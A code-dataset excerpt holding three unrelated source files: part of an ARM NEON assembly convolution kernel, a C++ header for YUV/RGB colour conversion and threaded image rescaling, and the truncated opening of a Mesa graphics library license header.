"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "r4", "q0", "q1", "q2", "q3", "q4", "q5", "q6", "q7", "q8", "q9", "q10", "q11"
);
#endif // __ARMV8
}
for (; i<size; i++)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4 + i % 4);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4);
#else
const float* kptr = kernel.channel(p / 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"ld1 {v12.4s}, [%12] \n"
// inch loop
"lsr w4, %w13, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"eor v8.16b, v8.16b, v8.16b \n"
"eor v9.16b, v9.16b, v9.16b \n"
"eor v10.16b, v10.16b, v10.16b \n"
"eor v11.16b, v11.16b, v11.16b \n"
"0: \n"
"prfm pldl1keep, [%4, #128] \n"
"ld1 {v4.4s}, [%4], #16 \n"
"prfm pldl1keep, [%5, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%5], #64 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v0.4s, v4.s[0] \n"
"fmla v9.4s, v1.4s, v4.s[1] \n"
"fmla v10.4s, v2.4s, v4.s[2] \n"
"fmla v11.4s, v3.4s, v4.s[3] \n"
"bne 0b \n"
"fadd v8.4s, v8.4s, v9.4s \n"
"fadd v10.4s, v10.4s, v11.4s \n"
"fadd v8.4s, v8.4s, v10.4s \n"
"fadd v12.4s, v12.4s, v8.4s \n"
"1: \n"
// remain loop
"and w4, %w13, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%4, #32] \n"
"ld1r {v4.4s}, [%4], #4 \n"
"prfm pldl1keep, [%5, #128] \n"
"ld1 {v0.4s}, [%5], #16 \n"
"subs w4, w4, #1 \n"
"fmla v12.4s, v4.4s, v0.4s \n"
"bne 2b \n"
"3: \n"
"st1 {v12.s}[0], [%0], #4 \n"
"st1 {v12.s}[1], [%1], #4 \n"
"st1 {v12.s}[2], [%2], #4 \n"
"st1 {v12.s}[3], [%3], #4 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v8", "v9", "v10", "v11", "v12"
);
#else // __ARMV8
asm volatile(
"vld1.f32 {d24-d25}, [%12] \n"
// inch loop
"lsr r4, %13, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"veor q8, q8, q8 \n"
"veor q9, q9, q9 \n"
"veor q10, q10, q10 \n"
"veor q11, q11, q11 \n"
"0: \n"
"pld [%4, #128] \n"
"vld1.f32 {d8-d9}, [%4 :128]! \n"
"pld [%5, #512] \n"
"vldm %5!, {d0-d7} \n"
// "vld1.f32 {d0-d3}, [%5 :128]! \n"
// "vld1.f32 {d4-d7}, [%5 :128]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q0, d8[0] \n"
"vmla.f32 q9, q1, d8[1] \n"
"vmla.f32 q10, q2, d9[0] \n"
"vmla.f32 q11, q3, d9[1] \n"
"bne 0b \n"
"vadd.f32 q8, q8, q9 \n"
"vadd.f32 q10, q10, q11 \n"
"vadd.f32 q8, q8, q10 \n"
"vadd.f32 q12, q12, q8 \n"
"1: \n"
// remain loop
"and r4, %13, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%4, #32] \n"
"vld1.f32 {d8[],d9[]}, [%4]! \n"
"pld [%5, #128] \n"
"vld1.f32 {d0-d1}, [%5 :128]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q12, q4, q0 \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d24[0]}, [%0]! \n"
"vst1.f32 {d24[1]}, [%1]! \n"
"vst1.f32 {d25[0]}, [%2]! \n"
"vst1.f32 {d25[1]}, [%3]! \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "r4", "q0", "q1", "q2", "q3", "q4", "q8", "q9", "q10", "q11", "q12"
);
#endif // __ARMV8
}
}
remain_outch_start += nn_outch << 2;
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = remain_outch_start; p<outch; p++)
{
Mat out0 = top_blob.channel(p);
const float bias0 = bias ? bias[p] : 0.f;
float* outptr0 = out0;
int i = 0;
for (; i + 7<size; i += 8)
{
const float* tmpptr = tmp.channel(i / 8);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4 + p % 4);
#else
const float* kptr = kernel.channel(p / 4 + p % 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"dup v8.4s, %w6 \n"
"dup v9.4s, %w6 \n"
// inch loop
"lsr w4, %w7, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%1, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%1], #64 \n"
"prfm pldl1keep, [%2, #128] \n"
"ld1 {v0.4s}, [%2], #16 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v9.4s, v5.4s, v0.s[0] \n"
"prfm pldl1keep, [%1, #512] \n"
"ld1 {v12.4s, v13.4s, v14.4s, v15.4s}, [%1], #64 \n"
"fmla v8.4s, v6.4s, v0.s[1] \n"
"fmla v9.4s, v7.4s, v0.s[1] \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v12.4s, v0.s[2] \n"
"fmla v9.4s, v13.4s, v0.s[2] \n"
"fmla v8.4s, v14.4s, v0.s[3] \n"
"fmla v9.4s, v15.4s, v0.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w7, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%1, #256] \n"
"ld1 {v4.4s, v5.4s}, [%1], #32 \n"
"prfm pldl1keep, [%2, #32] \n"
"ld1r {v0.4s}, [%2], #4 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v4.4s, v0.4s \n"
"fmla v9.4s, v5.4s, v0.4s \n"
"bne 2b \n"
"3: \n"
"st1 {v8.4s, v9.4s}, [%0], #32 \n"
: "=r"(outptr0), // %0
"=r"(tmpptr), // %1
"=r"(kptr) // %2
: "0"(outptr0),
"1"(tmpptr),
"2"(kptr),
"r"(bias0), // %6
"r"(inch) // %7
: "cc", "memory", "x4", "v0", "v4", "v5", "v6", "v7", "v8", "v9", "v12", "v13", "v14", "v15"
);
#else // __ARMV8
asm volatile(
"vdup.f32 q8, %6 \n"
"vdup.f32 q9, %6 \n"
// inch loop
"lsr r4, %7, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"0: \n"
"pld [%1, #512] \n"
"vldm %1!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%1 :128]! \n"
// "vld1.f32 {d12-d15}, [%1 :128]! \n"
"pld [%2, #128] \n"
"vld1.f32 {d0-d1}, [%2 :128]! \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q9, q5, d0[0] \n"
"pld [%1, #512] \n"
"vldm %1!, {d24-d31} \n"
// "vld1.f32 {d24-d27}, [%1 :128]! \n"
// "vld1.f32 {d28-d31}, [%1 :128]! \n"
"vmla.f32 q8, q6, d0[1] \n"
"vmla.f32 q9, q7, d0[1] \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q12, d1[0] \n"
"vmla.f32 q9, q13, d1[0] \n"
"vmla.f32 q8, q14, d1[1] \n"
"vmla.f32 q9, q15, d1[1] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and r4, %7, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%1, #256] \n"
"vld1.f32 {d8-d11}, [%1 :128]! \n"
"pld [%2, #32] \n"
"vld1.f32 {d0[],d1[]}, [%2]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q4, q0 \n"
"vmla.f32 q9, q5, q0 \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d16-d19}, [%0 :128]! \n"
: "=r"(outptr0), // %0
"=r"(tmpptr), // %1
"=r"(kptr) // %2
: "0"(outptr0),
"1"(tmpptr),
"2"(kptr),
"r"(bias0), // %6
"r"(inch) // %7
: "cc", "memory", "r4", "q0", "q4", "q5", "q6", "q7", "q8", "q9", "q12", "q13", "q14", "q15"
);
#endif // __ARMV8
}
for (; i + 3<size; i += 4)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4 + p % 4);
#else
const float* kptr = kernel.channel(p / 4 + p % 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"dup v8.4s, %w6 \n"
// inch loop
"lsr w4, %w7, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%1, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%1], #64 \n"
"prfm pldl1keep, [%2, #128] \n"
"ld1 {v0.4s}, [%2], #16 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v8.4s, v5.4s, v0.s[1] \n"
"fmla v8.4s, v6.4s, v0.s[2] \n"
"fmla v8.4s, v7.4s, v0.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w7, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%1, #128] \n"
"ld1 {v4.4s}, [%1], #16 \n"
"prfm pldl1keep, [%2, #32] \n"
"ld1r {v0.4s}, [%2], #4 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v4.4s, v0.4s \n"
"bne 2b \n"
"3: \n"
"st1 {v8.4s}, [%0], #16 \n"
: "=r"(outptr0), // %0
"=r"(tmpptr), // %1
"=r"(kptr) // %2
: "0"(outptr0),
"1"(tmpptr),
"2"(kptr),
"r"(bias0), // %6
"r"(inch) // %7
: "cc", "memory", "x4", "v0", "v4", "v5", "v6", "v7", "v8"
);
#else // __ARMV8
asm volatile(
"vdup.f32 q8, %6 \n"
// inch loop
"lsr r4, %7, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"0: \n"
"pld [%1, #512] \n"
"vldm %1!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%1 :128]! \n"
// "vld1.f32 {d12-d15}, [%1 :128]! \n"
"pld [%2, #128] \n"
"vld1.f32 {d0-d1}, [%2]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q8, q5, d0[1] \n"
"vmla.f32 q8, q6, d1[0] \n"
"vmla.f32 q8, q7, d1[1] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and r4, %7, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%1, #128] \n"
"vld1.f32 {d8-d9}, [%1 :128]! \n"
"pld [%2, #32] \n"
"vld1.f32 {d0[],d1[]}, [%2]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q4, q0 \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d16-d17}, [%0 :128]! \n"
: "=r"(outptr0), // %0
"=r"(tmpptr), // %1
"=r"(kptr) // %2
: "0"(outptr0),
"1"(tmpptr),
"2"(kptr),
"r"(bias0), // %6
"r"(inch) // %7
: "cc", "memory", "r4", "q0", "q4", "q5", "q6", "q7", "q8"
);
#endif // __ARMV8
}
for (; i<size; i++)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4 + i % 4);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4 + p % 4);
#else
const float* kptr = kernel.channel(p / 4 + p % 4);
#endif // __ARMV8
int q = 0;
float32x4_t _sum0 = vdupq_n_f32(0.f);
for (; q + 3<inch; q += 4)
{
float32x4_t _p0 = vld1q_f32(tmpptr);
tmpptr += 4;
float32x4_t _k0 = vld1q_f32(kptr);
kptr += 4;
#if __ARMV8
_sum0 = vfmaq_f32(_sum0, _p0, _k0);
#else
_sum0 = vmlaq_f32(_sum0, _p0, _k0);
#endif
}
#if __ARMV8
float sum0 = bias0 + vaddvq_f32(_sum0);
#else
float32x2_t _ss = vadd_f32(vget_low_f32(_sum0), vget_high_f32(_sum0));
float sum0 = bias0 + vget_lane_f32(vpadd_f32(_ss, _ss), 0);
#endif
for (; q<inch; q++)
{
sum0 += tmpptr[0] * kptr[0];
tmpptr++;
kptr++;
}
outptr0[0] = sum0;
outptr0++;
}
}
}
|
colorspace_ops.h | #ifndef colorspace_ops_h
#define colorspace_ops_h
#include <aRibeiroCore/aRibeiroCore.h>
#include <aRibeiroPlatform/aRibeiroPlatform.h>
using namespace aRibeiro;
#include <stdint.h>
#include <stdlib.h>
#include <memory.h>
#include <string.h>
#if defined(ARIBEIRO_SSE2)
#ifdef _MSC_VER //_WIN32
#include <intrin.h>
#else
#include <x86intrin.h> // Everything on SIMD...
#endif
#elif defined(ARIBEIRO_NEON)
#include <arm_neon.h>
#endif
ARIBEIRO_INLINE
static int iClamp(int v) {
if (v > 255)
return 255;
else if (v < 0)
return 0;
else
return v;
}
// from: https://en.wikipedia.org/wiki/YUV - Y′UV444 to RGB888 conversion
//
// C = (Y - 16)*298
// D = U - 128
// E = V - 128
//
#define YUV2RO(C, D, E) iClamp((C + 409 * (E) + 128) >> 8)
#define YUV2GO(C, D, E) iClamp((C - 100 * (D) - 208 * (E) + 128) >> 8)
#define YUV2BO(C, D, E) iClamp((C + 516 * (D) + 128) >> 8)
// from: https://en.wikipedia.org/wiki/YUV - Y′UV444 to RGB888 conversion
//
// RGB -> YUV conversion macros
//
#define RGB2Y(r, g, b) (((66 * (r) + 129 * (g) + 25 * (b) + 128) >> 8) + 16)
#define RGB2U(r, g, b) (((-38 * (r) - 74 * (g) + 112 * (b) + 128) >> 8) + 128)
#define RGB2V(r, g, b) (((112 * (r) - 94 * (g) - 18 * (b) + 128) >> 8) + 128)
const uint32_t FILTER_PRECISION_BITS = 10;//1024
const uint32_t FILTER_TOTAL_COUNT = (1 << FILTER_PRECISION_BITS);
const uint32_t FILTER_MASK = FILTER_TOTAL_COUNT - 1;
const uint32_t FILTER_HALF = (FILTER_MASK >> 1);
#define FILTER_NEAREST 1
#define FILTER_LINEAR 2
#define FILTER_SELECT FILTER_LINEAR
// Y′UV422 (y1, u, y2, v) -> https://en.wikipedia.org/wiki/YUV
static uint8_t* alloc_yuy2_aligned(int width, int height){
int size = width * height * 2;
uint8_t* result = (uint8_t*)malloc_aligned(size);
memset(result, 127, size);
return result;
}
static uint8_t* alloc_rgb_to_rgbx_aligned(uint8_t *rgb, int w, int h) {
int size = w*h*4;
uint8_t* result = (uint8_t*)malloc_aligned(size);
for(int y=0;y<h;y++){
for(int x=0;x<w;x++){
int input_index = (y * w + x) * 3;
int output_index = (y * w + x) * 4;
result[output_index + 0] = rgb[input_index + 0];
result[output_index + 1] = rgb[input_index + 1];
result[output_index + 2] = rgb[input_index + 2];
}
}
return result;
}
static void rgbx_to_yuy2(uint8_t *rgba,uint8_t *yuy2, int w, int h) {
uint32_t *rgba32 = (uint32_t *)rgba;
uint32_t *yuy2_32 = (uint32_t *)yuy2;
/*
for (int y = 0; y < h; y++) {
int rgba_line = y * w;
int yuyv_line = (y * w) >> 1;
for (int x = 0; x < w; x += 2) {
int rgb_access = rgba_line + x;
uint32_t rgb_a = rgba32[rgb_access];
uint8_t r_a = rgb_a & 0xff;
uint8_t g_a = (rgb_a >> 8) & 0xff;
uint8_t b_a = (rgb_a >> 16) & 0xff;
uint32_t rgb_b = rgba32[rgb_access + 1];
uint8_t r_b = rgb_b & 0xff;
uint8_t g_b = (rgb_b >> 8) & 0xff;
uint8_t b_b = (rgb_b >> 16) & 0xff;
uint32_t yuyv;
yuyv = (RGB2Y(r_a, g_a, b_a) & 0xff);
yuyv |= (RGB2U(r_a, g_a, b_a) & 0xff) << 8;
yuyv |= (RGB2Y(r_b, g_b, b_b) & 0xff) << 16;
yuyv |= (RGB2V(r_a, g_a, b_a) & 0xff) << 24;
int yuy2_access = yuyv_line + (x >> 1);
yuy2_32[yuy2_access] = yuyv;
}
}
*/
//#pragma omp parallel for
for (int _x = 0; _x < w * h; _x += 2) {
int x = _x % w;
int y = _x / w;
int rgba_line = y * w;
int yuyv_line = (y * w) >> 1;
int rgb_access = rgba_line + x;
uint32_t rgb_a = rgba32[rgb_access];
uint8_t r_a = rgb_a & 0xff;
uint8_t g_a = (rgb_a >> 8) & 0xff;
uint8_t b_a = (rgb_a >> 16) & 0xff;
uint32_t rgb_b = rgba32[rgb_access + 1];
uint8_t r_b = rgb_b & 0xff;
uint8_t g_b = (rgb_b >> 8) & 0xff;
uint8_t b_b = (rgb_b >> 16) & 0xff;
uint32_t yuyv;
yuyv = (RGB2Y(r_a, g_a, b_a) & 0xff);
yuyv |= (RGB2U(r_a, g_a, b_a) & 0xff) << 8;
yuyv |= (RGB2Y(r_b, g_b, b_b) & 0xff) << 16;
yuyv |= (RGB2V(r_a, g_a, b_a) & 0xff) << 24;
int yuy2_access = yuyv_line + (x >> 1);
yuy2_32[yuy2_access] = yuyv;
}
}
ARIBEIRO_INLINE
static int filter_int_lerp(int a, int b, int lrp) {
int one_minus_lrp = FILTER_MASK - lrp;
int result = (a * one_minus_lrp + b * lrp) >> FILTER_PRECISION_BITS;
return result;
}
/// D-f(0,1) ---*----- C-f(1,1)
/// | | |
/// | | |
/// . *--------P---------* P = (dx,dy)
/// | | |
/// | | |
/// A-f(0,0) ---*----- B-f(1,0)
ARIBEIRO_INLINE
static int filter_int_blerp(int A, int B, int C, int D,
int dx, int dy) {
int one_minus_dx = FILTER_MASK - dx;
int one_minus_dy = FILTER_MASK - dy;
/*
// x pass
int a_b = (A * one_minus_dx + B * dx) >> FILTER_PRECISION_BITS;
int d_c = (D * one_minus_dx + C * dx) >> FILTER_PRECISION_BITS;
// y pass
return (a_b * one_minus_dy + d_c * dy) >> FILTER_PRECISION_BITS;
*/
int a = one_minus_dx * one_minus_dy * A;
int b = dx * one_minus_dy * B;
int c = dx * dy * C;
int d = one_minus_dx * dy * D;
int result_a = (a + c) >> FILTER_PRECISION_BITS;
int result_b = (b + d) >> FILTER_PRECISION_BITS;
int result = (result_a + result_b) >> FILTER_PRECISION_BITS;
return result;
}
ARIBEIRO_INLINE
static int8_t filter_pixel(
const uint8_t *yuv420_buffer,
int _420_x,
int _420_y,
int _420_stride,
int _dst_x,
int _dst_y,
int _numerator,
int _denominator_shift
) {
#if FILTER_SELECT == FILTER_NEAREST
int index_420 = (_420_y * _420_stride + _420_x);
int8_t y = yuv420_buffer[index_420];
#elif FILTER_SELECT == FILTER_LINEAR
// the formula to convert the dst to 420 is:
//
// _420_x = ( _dst_x * _numerator ) >> _denominator_shift;
//
int shift_diff = _denominator_shift - FILTER_PRECISION_BITS;
uint32_t _x_hp = _dst_x * _numerator;
uint32_t _y_hp = _dst_y * _numerator;
if (shift_diff < 0) {
shift_diff = -shift_diff;
_x_hp = _x_hp << shift_diff;
_y_hp = _y_hp << shift_diff;
}
else {
_x_hp = _x_hp >> shift_diff;
_y_hp = _y_hp >> shift_diff;
}
// do x_lerp
uint32_t _x_hp_fraction = _x_hp & FILTER_MASK;
uint32_t _y_hp_fraction = _y_hp & FILTER_MASK;
//int _x_hp_access = (_x_hp >> FILTER_PRECISION_BITS) + center_yuv_420_x;
int _x_min, _x_max;
int _y_min, _y_max;
if (_x_hp_fraction > FILTER_HALF) {
// | * f | -> lrp = f-*
//use the next
_x_min = _420_x;
_x_max = _420_x + 1;
_x_hp_fraction -= FILTER_HALF;
}
else {
// | f * | -> lrp = f+*
//use the previous
_x_min = _420_x - 1;
_x_max = _420_x;
_x_hp_fraction += FILTER_HALF;
}
if (_y_hp_fraction > FILTER_HALF) {
// | * f | -> lrp = f-*
//use the next
_y_min = _420_y;
_y_max = _420_y + 1;
_y_hp_fraction -= FILTER_HALF;
}
else {
// | f * | -> lrp = f+*
//use the previous
_y_min = _420_y - 1;
_y_max = _420_y;
_y_hp_fraction += FILTER_HALF;
}
// test X
/*
int index_x_420_a = (_420_y * _420_stride + _x_min);
int index_x_420_b = (_420_y * _420_stride + _x_max);
int8_t y = filter_int_lerp(yuv420_buffer[index_x_420_a], yuv420_buffer[index_x_420_b], _x_hp_fraction);
// */
// test y
/*
int index_y_420_a = (_y_min * _420_stride + _420_x);
int index_y_420_b = (_y_max * _420_stride + _420_x);
int8_t y = filter_int_lerp(yuv420_buffer[index_y_420_a], yuv420_buffer[index_y_420_b], _y_hp_fraction);
// */
// blerp
/// D-f(0,1) ---*----- C-f(1,1)
/// | | |
/// | | |
/// . *--------P---------* P = (dx,dy)
/// | | |
/// | | |
/// A-f(0,0) ---*----- B-f(1,0)
int index_a = (_x_min + _y_min * _420_stride);// (0,0)
int index_b = (_x_max + _y_min * _420_stride);// (1,0)
int index_c = (_x_max + _y_max * _420_stride);// (1,1)
int index_d = (_x_min + _y_max * _420_stride);// (0,1)
int8_t y = filter_int_blerp(
yuv420_buffer[index_a], yuv420_buffer[index_b], yuv420_buffer[index_c], yuv420_buffer[index_d],
_x_hp_fraction, _y_hp_fraction);
// */
#endif
return y;
}
// find denominator power 2 shift
ARIBEIRO_INLINE
static void computeNumeratorDenominatorShift(int in_num, int in_deno, int *out_num, int *out_shift) {
// find full_deno power 2 shift
int deno_shift = 0;
int new_deno_shift_aux = 1 << deno_shift;
while (new_deno_shift_aux < in_deno) {
new_deno_shift_aux <<= 1;
deno_shift++;
}
*out_shift = deno_shift;
//recompute the _numerator and full_deno
*out_num = (in_num * new_deno_shift_aux) / in_deno;
}
struct CopyRescaleMultithread_Job {
int block;
int blockStart;
int blockEnd;
int yuy_w;
int yuy_stride;
int half_num;
int half_deno_shift;
int half_center_yuv_420_x;
int half_center_yuv_420_y;
int yuv420_w;
int yuv420_h;
int full_num;
int full_deno_shift;
int center_yuv_420_x;
int center_yuv_420_y;
const uint8_t *yuv420;
uint8_t *yuy2;
int yuv_420_stride_y;
int yuv_420_stride_uv;
int src_v_start_index;
int src_u_start_index;
};
class CopyRescaleMultithread{
std::vector< PlatformThread * > threads;
int jobDivider;
int threadCount;
PlatformSemaphore semaphore;
ObjectQueue<CopyRescaleMultithread_Job> queue;
void threadRun() {
while (!PlatformThread::isCurrentThreadInterrupted()){
CopyRescaleMultithread_Job job = queue.dequeue();
if (queue.isSignaled())
break;
for (int _y = job.blockStart; _y < job.blockEnd; _y++) {
for (int _x = 0; _x < job.yuy_w; _x++) {
int index_y = (_y * job.yuy_stride + _x) << 1;
int index_u_or_v = index_y + 1;
int _x_dst_pos = _x;
int _y_dst_pos = _y;
int half_420_x = ((_x_dst_pos * job.half_num) >> job.half_deno_shift) + job.half_center_yuv_420_x;
int half_420_y = ((_y_dst_pos * job.half_num) >> job.half_deno_shift) + job.half_center_yuv_420_y;
if (half_420_x >= 2 && half_420_x < ((job.yuv420_w >> 1) - 2) &&
half_420_y >= 0 && half_420_y < (job.yuv420_h >> 1)) {
int _420_x = ((_x_dst_pos * job.full_num) >> job.full_deno_shift) + job.center_yuv_420_x;
int _420_y = ((_y_dst_pos * job.full_num) >> job.full_deno_shift) + job.center_yuv_420_y;
job.yuy2[index_y] = filter_pixel(
job.yuv420,
_420_x, _420_y,
job.yuv_420_stride_y,
_x_dst_pos, _y_dst_pos,
job.full_num, job.full_deno_shift
);
int uv_start_index;
if (_x % 2 != 0) {
// process (UV) data
// the V value is related to the previous X position of the destination buffer
_x_dst_pos -= 1;//before pixel processing for 'v' from 'uv' buffer
half_420_x = ((_x_dst_pos * job.half_num) >> job.half_deno_shift) + job.half_center_yuv_420_x;
uv_start_index = job.src_v_start_index;
}
else
uv_start_index = job.src_u_start_index;
job.yuy2[index_u_or_v] = filter_pixel(
&job.yuv420[uv_start_index],
half_420_x, half_420_y,
job.yuv_420_stride_uv,
_x_dst_pos, _y_dst_pos,
job.half_num, job.half_deno_shift
);
}
else {
//black
job.yuy2[index_y] = 16;
job.yuy2[index_u_or_v] = 128;
}
}
}
semaphore.release();
}
}
public:
void yuv420_to_yuy2_copy_rescale(const uint8_t *yuv420, int yuv420_w, int yuv420_h, uint8_t *yuy2, int yuy_w, int yuy_h) {
int center_yuy_x = yuy_w / 2;
int center_yuy_y = yuy_h / 2;
float aspect_yuv = (float)yuv420_w / (float)yuv420_h;
float aspect_yuy = (float)yuy_w / (float)yuy_w;
bool fit_width = (aspect_yuv <= aspect_yuy);
int full_num = 1;
int full_deno_shift = 0;
int half_num = 1;
int half_deno_shift = 0;
int px_to_remove = 8;
if (!fit_width) {
//fit width
computeNumeratorDenominatorShift(yuv420_w - px_to_remove, yuy_w, &full_num, &full_deno_shift);
computeNumeratorDenominatorShift((yuv420_w - px_to_remove) >> 1, yuy_w, &half_num, &half_deno_shift);
}
else {
//fit height
computeNumeratorDenominatorShift(yuv420_h - px_to_remove, yuy_h, &full_num, &full_deno_shift);
computeNumeratorDenominatorShift((yuv420_h - px_to_remove) >> 1, yuy_h, &half_num, &half_deno_shift);
}
px_to_remove = 0;
int center_yuv_420_x = ((yuv420_w - px_to_remove) >> 1) - ((center_yuy_x *full_num) >> full_deno_shift) - 2;
int center_yuv_420_y = ((yuv420_h - px_to_remove) >> 1) - ((center_yuy_y *full_num) >> full_deno_shift) - 2;
int half_center_yuv_420_x = ((yuv420_w - px_to_remove) >> 2) - ((center_yuy_x *half_num) >> half_deno_shift) - 1;
int half_center_yuv_420_y = ((yuv420_h - px_to_remove) >> 2) - ((center_yuy_y *half_num) >> half_deno_shift) - 1;
int yuv_420_stride_y = yuv420_w;
int yuv_420_stride_uv = yuv420_w >> 1;
int yuv_420_y_total_size = yuv_420_stride_y * yuv420_h;
int yuv_420_uv_total_size = yuv_420_stride_uv * (yuv420_h >> 1);
int src_u_start_index = yuv_420_y_total_size;
int src_v_start_index = src_u_start_index + yuv_420_uv_total_size;
int yuy_stride = yuy_w;
//int h_per_block = yuy_h / jobDivider + (((yuy_h % jobDivider) > 0) ? 1 : 0);
int division = jobDivider;
int h_per_block = yuy_h / jobDivider;// +(((height % jobDivider) > 0) ? 1 : 0);
if (yuy_h % jobDivider) {
//or we choose divison + 1 or we choose h_per_block + 1
int div_plus_1_total = (division + 1) * h_per_block;
int h_per_block_plus_1_total = division * (h_per_block + 1);
if (div_plus_1_total < h_per_block_plus_1_total)
division++;
else
h_per_block++;
}
CopyRescaleMultithread_Job job;
job.yuy_w = yuy_w;
job.yuy_stride = yuy_stride;
job.half_num = half_num;
job.half_deno_shift = half_deno_shift;
job.half_center_yuv_420_x = half_center_yuv_420_x;
job.half_center_yuv_420_y = half_center_yuv_420_y;
job.yuv420_w = yuv420_w;
job.yuv420_h = yuv420_h;
job.full_num = full_num;
job.full_deno_shift = full_deno_shift;
job.center_yuv_420_x = center_yuv_420_x;
job.center_yuv_420_y = center_yuv_420_y;
job.yuv420 = yuv420;
job.yuy2 = yuy2;
job.yuv_420_stride_y = yuv_420_stride_y;
job.yuv_420_stride_uv = yuv_420_stride_uv;
job.src_v_start_index = src_v_start_index;
job.src_u_start_index = src_u_start_index;
for (int block = 0; block < division; block++) {
job.block = block;
job.blockStart = block * h_per_block;
job.blockEnd = (block + 1) * h_per_block;
if (yuy_h < job.blockEnd)
job.blockEnd = yuy_h;
queue.enqueue(job);
}
for (int block = 0; block < division; block++)
semaphore.blockingAcquire();
}
CopyRescaleMultithread(int threadCount, int jobDivider):semaphore(0){
this->jobDivider = jobDivider;
this->threadCount = threadCount;
for(int i=0;i<threadCount;i++){
threads.push_back(new PlatformThread(this, &CopyRescaleMultithread::threadRun));
}
for (int i = 0; i < threads.size(); i++)
threads[i]->start();
}
void finalizeThreads() {
printf("[CopyRescaleMultithread] finalize threads start\n");
for (int i = 0; i < threads.size(); i++)
threads[i]->interrupt();
for (int i = 0; i < threads.size(); i++)
threads[i]->wait();
printf("[CopyRescaleMultithread] finalize threads done\n");
}
virtual ~CopyRescaleMultithread() {
for(int i=0;i<threads.size();i++)
threads[i]->interrupt();
for(int i=0;i<threads.size();i++)
threads[i]->wait();
for(int i=0;i<threads.size();i++)
delete threads[i];
threads.clear();
threadCount = 0;
}
};
#endif |
s_aatritemp.h | /*
* Mesa 3-D graphics library
* Version: 7.0.3
*
* Copyright (C) 1999-2007 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
